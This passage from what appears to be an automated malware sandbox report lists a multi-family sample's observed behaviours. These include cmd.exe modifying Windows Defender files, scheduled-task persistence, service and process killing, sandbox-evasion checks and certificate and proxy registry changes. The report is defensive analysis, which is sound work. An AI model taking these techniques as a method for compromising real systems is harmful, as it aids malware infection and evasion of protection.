opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 37 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI5177.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI14FA.tmp msiexec.exe File created C:\Windows\Installer\e581329.msi msiexec.exe File created C:\Windows\Installer\e58132f.msi msiexec.exe File opened for modification C:\Windows\Installer\e58132f.msi msiexec.exe File created C:\Windows\Installer\SourceHash{2EF5B19F-6B07-454C-9A55-639BDA404CDF} msiexec.exe File opened for modification C:\Windows\Installer\MSI6BE6.tmp msiexec.exe File created C:\Windows\Tasks\controladvanced_MKO_test.job cmd.exe File created C:\Windows\Tasks\rapes.job TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE File opened for modification C:\Windows\Installer\e58132a.msi msiexec.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\Installer\e581325.msi msiexec.exe File created C:\Windows\Installer\e58132a.msi msiexec.exe File created C:\Windows\Installer\SourceHash{A96A5C12-2BA0-4882-B94A-BED0ECDD226E} msiexec.exe File created C:\Windows\Installer\e58132e.msi msiexec.exe File created C:\Windows\Installer\e581333.msi msiexec.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File created C:\Windows\Tasks\ctrlTask.job cmd.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{37BD7FCD-CFF5-41A4-855A-AA18B2383F73} msiexec.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File created C:\Windows\Installer\e581325.msi msiexec.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Tasks\TECLA.job 890172171_x64.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Tasks\httpTool_alpha.job cmd.exe File created C:\Windows\Tasks\Protecttls.job cmd.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2816 sc.exe 6040 sc.exe 5612 sc.exe 1544 sc.exe 5884 sc.exe 1324 sc.exe 2284 sc.exe 932 sc.exe 1556 sc.exe 2656 sc.exe 5784 sc.exe 5700 sc.exe 4848 sc.exe 4892 sc.exe 5772 sc.exe 3156 sc.exe 4084 sc.exe 4924 sc.exe 5260 sc.exe 2440 sc.exe 3708 sc.exe 5176 sc.exe 5272 sc.exe 60 sc.exe 3896 sc.exe 3628 sc.exe 2856 sc.exe 5768 sc.exe 2732 sc.exe 5964 sc.exe 4092 sc.exe 6024 sc.exe 3076 sc.exe 1868 sc.exe 3744 sc.exe 1588 sc.exe 224 sc.exe 3432 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5704 680 WerFault.exe 220 8000 4448 WerFault.exe 331 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 96b3ec11f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEYKSCXV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5338edf835.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5e593f5981.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 96b3ec11f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KRWXARXD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language datCB3B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LXUZVRLG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a86f684b95.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Checks processor information in registry 2 TTPs 23 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4628 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 4208 taskkill.exe 4320 taskkill.exe 5396 taskkill.exe 2372 taskkill.exe 1720 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" datCB3B.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dat1D16.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" datCB3B.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Abspawnhlp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Abspawnhlp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ datCB3B.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" dat1D16.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Updater.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings Abspawnhlp.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5164 schtasks.exe 5768 schtasks.exe 1448 schtasks.exe 7020 schtasks.exe 5892 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 6400 CamMenuMaker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5816 powershell.exe 5816 powershell.exe 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 2492 rapes.exe 2492 rapes.exe 4896 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4372 MSBuild.exe 4372 MSBuild.exe 4372 MSBuild.exe 4372 MSBuild.exe 3896 rapes.exe 3896 rapes.exe 2892 MSBuild.exe 2892 MSBuild.exe 2892 MSBuild.exe 2892 MSBuild.exe 1204 MSBuild.exe 1204 MSBuild.exe 1204 MSBuild.exe 1204 MSBuild.exe 4328 MSBuild.exe 4328 MSBuild.exe 4328 MSBuild.exe 4328 MSBuild.exe 4364 5e593f5981.exe 4364 5e593f5981.exe 244 msiexec.exe 244 msiexec.exe 2328 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 4444 cmd.exe 4444 cmd.exe 4444 cmd.exe 1808 a86f684b95.exe 1808 a86f684b95.exe 244 msiexec.exe 244 msiexec.exe 1592 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 5232 55ba869587.exe 5232 55ba869587.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 652 Process not Found 652 Process not Found 7400 tzutil.exe -
Suspicious behavior: MapViewOfSection 23 IoCs
pid Process 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 4376 CamMenuMaker.exe 1544 CamMenuMaker.exe 2316 Abspawnhlp.exe 3412 Abspawnhlp.exe 1656 CamMenuMaker.exe 1544 CamMenuMaker.exe 4376 CamMenuMaker.exe 1656 CamMenuMaker.exe 7464 Abspawnhlp.exe 7464 Abspawnhlp.exe 8072 p3hx1_003.exe 8072 p3hx1_003.exe 8072 p3hx1_003.exe 5704 Abspawnhlp.exe 5704 Abspawnhlp.exe 7464 Abspawnhlp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
